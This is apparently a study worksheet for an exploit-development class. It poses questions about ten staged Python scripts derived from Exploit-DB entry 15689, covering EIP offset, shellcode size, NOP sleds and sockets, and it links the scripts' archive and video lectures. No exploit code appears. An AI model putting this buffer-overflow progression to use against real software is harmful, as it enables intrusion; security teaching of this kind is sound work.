Analysis of the training walk-through based on Exploit-DB ID 15689:
http://45.63.104.73/ff.zip




ff1.py
1. What does the sys module do? Call System Commands
2. What are sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?



ff2.py
1. Explain what lines 18 - 20 are doing.
2. What is pattern_create.rb doing, and where can I find it?
3. Why can't I just double-click the file to run this script?



ff3.py
1. Explain what is happening in lines 17 to 25.
2. Explain what is happening in lines 30 to 32.
3. Why is everything below line 35 commented out?



ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?



ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?



ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?




ff7.py
1. What is a tuple in Python?
2. How big is the shellcode in this script?
3. Did your app crash from this script?




ff8.py
1. How big is the shellcode in this script?
2. What is try/except in Python?
3. What is socket.SOCK_STREAM in Python?



ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. What is socket.SOCK_STREAM in Python?




ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?


Required review videos to watch tonight:
----------------------------------------
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
Please watch videos 1-5 tonight. Vivek has a deep accent, so I understand that it may be difficult, but his material is very good - probably the best on the internet today.

Recommended (not required) videos to watch tonight:
---------------------------------------------------
For more background on Assembly I would recommend the following video series (videos 1-11):
https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
Again, you DO NOT have to watch these tonight, but if you are really interested in the subject of exploit development I think they will be very helpful.



---------------------------------------------------------------------------------------------------------------------